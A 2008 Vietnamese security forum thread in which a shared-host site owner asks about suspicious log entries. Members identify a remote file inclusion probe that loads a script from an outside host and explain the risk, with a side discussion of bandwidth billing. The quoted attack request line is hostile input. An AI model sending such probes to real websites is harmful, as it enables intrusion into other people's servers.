banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP  XML
  [Question]   Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 21/10/2008 15:10:31 (+0700) | #1 | 156015
[Avatar]
superthin
Member

[Minus]    0    [Plus]
Joined: 25/08/2003 10:29:42
Messages: 52
Location: Vietnam
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tình hình là hôm nay vào DirectAdmin để xem nguyên nhân vì sao mà ảnh nền trang web không thể nạp lên được dù HTML đúng path, test thử trên localhost và host khác OK. Mới phát hiện ra rằng có hai dòng rất khả nghi:

Code:
tên miền/include_once.php?include_file=http://www.moppedtreffen.de/icon/id.txt??




Code:
http://69amigas.com/chat/chat/localization/spanish/echo.txt???


Nhìn địa chỉ IP truy cập thì thấy hai câu trên đều xuất phát từ một địa chỉ IP ở nước ngoài. Nhờ các bạn khảo sát giúp xem hai cái câu lệnh kia thể hiện người ta định bày trò gì? Liệu có nguy hiểm đến trang web của mình?

Để cho chắc ăn, trên host mình hiện giờ không có file include_once.php bằng PHP script nhưng mình upload lên 1 file có dung lượng 400MB và là file phim .avi đổi tên thành include_once.php để cho hacker nghịch cho vui smilie

Chân thành cám ơn!
www.khoancatbetong.com - khó ăn cát bê tông!
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 21/10/2008 16:38:39 (+0700) | #2 | 156020
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Bồ tham khảo cái txt file được include trên request chưa?

Làm "trò" gì thì nằm trong cái txt file đó và bồ đã nhận định "include" là chìa khóa.

Cái gì chớ "shared host" thì quên đi chuyện bảo mật.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 22/10/2008 02:13:03 (+0700) | #3 | 156073
jforum3000
Member

[Minus]    0    [Plus]
Joined: 26/08/2007 02:53:39
Messages: 1172
Offline
[Profile] [PM]

conmale wrote:
Cái gì chớ "shared host" thì quên đi chuyện bảo mật. 

Vậy là đành phó mặc số phận cho các admin server sao anh?
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 22/10/2008 04:48:55 (+0700) | #4 | 156086
[Avatar]
superthin
Member

[Minus]    0    [Plus]
Joined: 25/08/2003 10:29:42
Messages: 52
Location: Vietnam
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ùi, conmale ơi, mình chả biết quái quỉ gì về bảo mật đâu, không biết tí nào. Cài đặt một diễn đàn viết bằng PHP dạng dễ như punBB mà còn thất bại nữa là. Chẳng qua là thằng bạn nó có một shared host có sẵn cái diễn đàn mà ngày trước nó được ai đó tặng không có thời gian rảnh nên tặng lại, và chủ yếu là vào viết bài thôi. Cho nên bác bảo đọc cái file txt kia thì smilie chịu, chỉ hiểu rằng dường như nó là một thứ ngôn ngữ lập trình, còn nó là ngôn ngữ gì, có ý định làm gì thì... bó tay cả.

Làm ơn phân tích và báo cáo giúp xem vấn đề là người ta đã âm thầm kiểm soát toàn bộ trang web của mình hay chưa?

Xin cám ơn!
www.khoancatbetong.com - khó ăn cát bê tông!
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 22/10/2008 16:17:55 (+0700) | #5 | 156146
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]
Cả http://www.moppedtreffen.de/icon/id.txt http://69amigas.com/chat/chat/localization/spanish/echo.txt có nội dung như nhau.
Xem kỹ hơn thì đoạn code trong 2 file này đơn thuần chỉ là print 1 số thông tin của hệ thống, không có gì gọi là "phá hoại" cả.

Trong 2 file thấy 1 cái tên: Osirys --> Google phát liền smilie

Dựa vào 1 số thông tin thu thập được thì tạm thời kết luận thế này:
- Có 1 anh chàng tên là Osirys.
- Anh chàng này viết ra 1 số script scan website xem thử nó có lỗi gì không, cụ thể ở đây là lỗi remote include của 1 số script PHP.
- Có ai đó đang dùng cái script của anh chàng này để "test" cái host của bạn.

Vậy thôi!

mình upload lên 1 file có dung lượng 400MB và là file phim .avi đổi tên thành include_once.php để cho hacker nghịch cho vui
==> đừng nghịch dại thế! Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 22/10/2008 22:26:09 (+0700) | #6 | 156173
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Cũng như bác Thành (nbthanh) đã viết, ai đó (0sirys?) gửi môt HTTP command "GET" đến cổng 80 của webserver đang hosting website của bạn. Kèm theo GET command là một code: include_once(), cụ thể ở đây là include_once.php.
Rồi GET command nói trên reference (tham chiếu - nói đơn giản là đưa vào lệnh GET) một PHP script , nằm ở trang web có địa chỉ là:

http://www.moppedtreffen.de/icon/id.txt
(Bạn access vào mà xem)

Script này sẽ execute (thưc thi ) nhằm cố gắng lấy ra môt số file PHP trong webserver của bạn, cho hiện ra và in ra ở máy hacker.

Webserver hosting website của bạn chạy Windows và cài PHP 5 phải không?
À nếu muốn cho "nó" load file PHP về máy nó thì bạn phải đăt file ở chỗ này chứ , thí dụ C:/Program Files/"PHP file" (khi webserver chay Windows). File thì nhỏ thôi, như bác Thành đã nói, nôi dụng chửi tục môt chút là "đạt" rồi. (Mà chắc phải chửi bằng tiếng Anh đấy). Hì hì
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Question]   Xin hỏi thêm chút xíu 24/10/2008 04:41:57 (+0700) | #7 | 156350
[Avatar]
superthin
Member

[Minus]    0    [Plus]
Joined: 25/08/2003 10:29:42
Messages: 52
Location: Vietnam
Offline
[Profile] [PM] [WWW] [Yahoo!]

PXMMRF wrote:

Webserver hosting website của bạn chạy Windows và cài PHP 5 phải không?
À nếu muốn cho "nó" load file PHP về máy nó thì bạn phải đăt file ở chỗ này chứ , thí dụ C:/Program Files/"PHP file" (khi webserver chay Windows).  


Có lẽ không phải host chạy Windows, mình cũng chả rành khoản này đâu, nhưng không cho rằng host chạy với Windows, PHP5 thì đúng, nhưng LINUX hay BSD gì ấy vì khi upload vài file lên thì nó phân biệt tên file chữ thường và CHỮ HOA => có lẽ không phải Windows.

Xin hỏi thêm, là nếu thằng kẻ khai thác thông tin kia lấy thông tin thì nó sẽ lấy được thông tin gì của mình? Liệu nó có lấy được mật khẩu hoặc cái gì ấy mà đủ thông tin để lợi dụng thông tin có được ấy gây hại cho trang web?
www.khoancatbetong.com - khó ăn cát bê tông!
[Up] [Print Copy]
  [Question]   Xin hỏi thêm chút xíu 24/10/2008 05:10:55 (+0700) | #8 | 156355
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]

superthin wrote:
Xin hỏi thêm, là nếu thằng kẻ khai thác thông tin kia lấy thông tin thì nó sẽ lấy được thông tin gì của mình? Liệu nó có lấy được mật khẩu hoặc cái gì ấy mà đủ thông tin để lợi dụng thông tin có được ấy gây hại cho trang web? 

Có lẽ bạn chưa nắm được vấn đề: như tôi và bác PXMMRF trả lời thì có "ai đó" đang thử xem site của bạn có bị lỗi hay không?
Hoàn toàn không có thông tin nào (vào thời điểm hiện tại) chứng tỏ rằng "ai đó" đã lấy được thông tin của bạn, cũng chưa có chứng cứ nào cho biét là site hay host của bạn có lỗi.
Như vậy thì hiện tại không thể trả lời được là "ai đó" có thể lợi dụng được gì trên site của bạn.
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 26/10/2008 06:19:03 (+0700) | #9 | 156611
ken_shin
Member

[Minus]    0    [Plus]
Joined: 30/10/2007 19:18:33
Messages: 30
Offline
[Profile] [PM]
đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó? 

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 26/10/2008 23:37:05 (+0700) | #10 | 156686
[Avatar]
nlfb
Journalist

[Minus]    0    [Plus]
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
[Profile] [PM] [Yahoo!]

ken_shin wrote:
đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó? 

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất) 


Script này thường làm tự động chứ thường không ai ngồi canh thấy request đến 400MB thì tắt đâu bạn, và còn đường truyền nữa chứ, 25GB băng thông tại VN thì thấy to như bánh xe bò chứ thử đưa anh conmale xem ảnh tải mất bao lâu smilie
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 27/10/2008 07:16:33 (+0700) | #11 | 156725
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]

ken_shin wrote:
đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó? 

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất) 

Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được.
Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì.
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 28/10/2008 12:10:34 (+0700) | #12 | 156936
ken_shin
Member

[Minus]    0    [Plus]
Joined: 30/10/2007 19:18:33
Messages: 30
Offline
[Profile] [PM]

nbthanh wrote:

ken_shin wrote:
đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó? 

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất) 

Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được.
Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì. 

thank cái này mới trước giờ không biết.hình như hơi hiểu rùi.
nhưng nghĩ lại thì nếu sever bắt đầu response là tính băng thông . dù client nó cứ request và từ chối không nhận response
thì sever vẫn mất băng thông trên đường đi (mình ở vn chơi đứa nào bên us chắc hiệu quả lém vì đường xa) nhưng với 1 file 400mb thì làm sao hao hết trên đường đi được mình nghĩ cùng lắm là vài mb (chắc không tới đâu).nếu cứ mỗi request mà mất 400mb thì hóa ra bên quản lý host họ ăn gian băng thông của khách hàng rùi.
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 28/10/2008 12:47:51 (+0700) | #13 | 156940
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]

ken_shin wrote:
thank cái này mới trước giờ không biết.hình như hơi hiểu rùi.
nhưng nghĩ lại thì nếu sever bắt đầu response là tính băng thông . dù client nó cứ request và từ chối không nhận response
thì sever vẫn mất băng thông trên đường đi (mình ở vn chơi đứa nào bên us chắc hiệu quả lém vì đường xa) nhưng với 1 file 400mb thì làm sao hao hết trên đường đi được mình nghĩ cùng lắm là vài mb (chắc không tới đâu).nếu cứ mỗi request mà mất 400mb thì hóa ra bên quản lý host họ ăn gian băng thông của khách hàng rùi. 

Bạn download file trên internet bạn có để ý thấy là file chưa load xong nhưng ở client biết được dung lượng file là bao nhiêu để tính giờ download?
Lý do là vì trong phần header của response từ server nó có thông tin file size. Như vậy, nếu host dựa vào thông số này để tính băng thông thì thế nào? Host nó phải tính cái nào có lợi cho nó chứ. Còn chuyện client request nhưng chỉ đọc xong header rồi ngắt thì...bạn ráng chịu à smilie
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP 28/10/2008 13:28:49 (+0700) | #14 | 156947
ken_shin
Member

[Minus]    0    [Plus]
Joined: 30/10/2007 19:18:33
Messages: 30
Offline
[Profile] [PM]
nói vậy thì chỉ có nước chạy ra cho mấy đứa bán host chửi nó 1 trân cho bõ tức ( không biết có chửi lại nó ko hay bị nó chgửi) thiệt tình làm ăn gì mà gian lân không hà.đúng là dan vn .
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 28/10/2008 14:43:57 (+0700) | #15 | 156949
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]

ken_shin wrote:
nói vậy thì chỉ có nước chạy ra cho mấy đứa bán host chửi nó 1 trân cho bõ tức ( không biết có chửi lại nó ko hay bị nó chgửi) thiệt tình làm ăn gì mà gian lân không hà.đúng là dan vn . 

Host nào chả vậy chứ riêng gì VN hay nước ngoài. Mà host VN thì chương trình quản lý băng thông cũng là của nước ngoài mà smilie
Cách tính dựa trên response từ header là tương đối chính xác nhanh và đỡ mất công tính toán nhất.
Với lại trong đa số trường hợp, 1 file HTML hay GIF vài chục Kb trở lại thì client chưa kịp "ngắt" là toàn bộ nội dung file đã bay ra khỏi server rồi.
Còn nếu bạn host file tới 400Mb mà bị "rút ruột" kiểu này thì ráng chịu vậy, thiểu số phải theo đa số chứ smilie
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 30/10/2008 09:33:27 (+0700) | #16 | 156967
seraphpl
Member

[Minus]    0    [Plus]
Joined: 04/12/2006 19:52:12
Messages: 97
Location: xxx
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

nbthanh wrote:

ken_shin wrote:
đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó? 

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất) 

Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được.
Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì. 

cho em hỏi là: nếu như vậy thì nhà cung cấp dịch vụ internet(fpt,vnn,viettel,...) cũng áp dụng cách này để tính dung lượng dữ liệu hàng tháng của mỗi thuê bao?
[Up] [Print Copy]
  [Question]   Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host 30/10/2008 10:52:21 (+0700) | #17 | 156972
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]
ISP thì có thể họ tính dung lượng cách khác, vì bạn đâu có download trực tiếp từ host của bạn, mà bạn vào internet (download/upload từ site khác) thông qua họ.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|